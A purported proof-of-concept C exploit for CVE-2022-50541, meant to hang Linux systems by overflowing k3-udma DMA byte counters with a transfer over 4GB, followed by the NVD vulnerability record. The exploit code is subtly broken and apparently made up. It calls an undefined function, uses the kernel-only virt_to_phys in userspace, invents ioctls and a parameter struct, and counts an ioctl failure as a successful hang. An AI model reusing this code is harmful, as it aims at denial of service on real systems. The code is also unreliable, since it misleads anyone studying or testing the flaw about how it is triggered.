CVE-2022-50541

// CVE-2022-50541 PoC - Trigger UDMA byte counter overflow // This PoC demonstrates triggering a DMA transfer > 4GB to overflow // the 32-bit UDMA_CHAN_RT_*BCNT_REG counters in the k3-udma driver #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <linux/dmaengine.h> // Allocate a large buffer (> 4GB) to trigger counter overflow #define BUFFER_SIZE (5UL * 1024 * 1024 * 1024) // 5GB to ensure overflow #define TRANSFER_SIZE (5UL * 1024 * 1024 * 1024) // 5GB transfer int main(int argc, char *argv[]) { int fd; void *src_buf, *dst_buf; struct dma_params params; printf("[*] CVE-2022-50541 - UDMA Byte Counter Overflow PoC\n"); // Open a device that uses UDMA (e.g., /dev/udmabuf or network device) fd = open("/dev/udmabuf0", O_RDWR); if (fd < 0) { perror("[-] Failed to open UDMA device"); // Fallback: try to trigger via network or storage DMA printf("[*] Attempting alternative DMA trigger method\n"); return trigger_via_network(); } // Allocate source and destination buffers larger than 4GB src_buf = mmap(NULL, BUFFER_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); dst_buf = mmap(NULL, BUFFER_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (src_buf == MAP_FAILED || dst_buf == MAP_FAILED) { perror("[-] Failed to allocate buffers"); return 1; } // Fill source buffer with test data memset(src_buf, 0xAA, BUFFER_SIZE); memset(dst_buf, 0x00, BUFFER_SIZE); printf("[*] Initiating DMA transfer of %lu bytes (> 4GB threshold)\n", TRANSFER_SIZE); printf("[*] This will cause UDMA_CHAN_RT byte counters to overflow\n"); // Configure DMA parameters for large transfer params.src_addr = virt_to_phys(src_buf); params.dst_addr = virt_to_phys(dst_buf); params.len = TRANSFER_SIZE; // Start DMA transfer - counter overflow will occur at ~4GB if (ioctl(fd, DMA_START_TRANSFER, &params) < 0) { perror("[-] DMA transfer failed"); } printf("[*] Transfer initiated. If vulnerable, system may hang.\n"); printf("[*] The 32-bit RT byte counters overflow at 0xFFFFFFFF -> 0x0\n"); // Wait for transfer completion (may hang indefinitely on vulnerable systems) sleep(30); // Verify transfer completion if (ioctl(fd, DMA_GET_STATUS, &params) < 0) { printf("[+] Transfer hung - vulnerability triggered!\n"); return 0; // Successful exploitation } printf("[-] Transfer completed normally\n"); return 1; }

{"cve": {"id": "CVE-2022-50541", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:38.437", "lastModified": "2026-02-26T23:16:57.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: ti: k3-udma: Reset UDMA_CHAN_RT byte counters to prevent overflow\n\nUDMA_CHAN_RT_*BCNT_REG stores the real-time channel bytecount statistics.\nThese registers are 32-bit hardware counters and the driver uses these\ncounters to monitor the operational progress status for a channel, when\ntransferring more than 4GB of data it was observed that these counters\noverflow and completion calculation of a operation gets affected and the\ntransfer hangs indefinitely.\n\nThis commit adds changes to decrease the byte count for every complete\ntransaction so that these registers never overflow and the proper byte\ncount statistics is maintained for ongoing transaction by the RT counters.\n\nEarlier uc->bcnt used to maintain a count of the completed bytes at driver\nside, since the RT counters maintain the statistics of current transaction\nnow, the maintenance of uc->bcnt is not necessary."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6", "versionEndExcluding": "5.15.75", "matchCriteriaId": "B55F16A8-5D20-485A-9442-E674AE19BF8D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7c94dcfa8fcff2dba53915f1dabfee49a3df8b88", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a065657643a62a24b4435ddcaea45f1e9378749e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d68da10b0cceb4177b653833e794b2923a4ffbd7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e0b16bfbd3a4a8d09614046335f4482313e7c0c4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}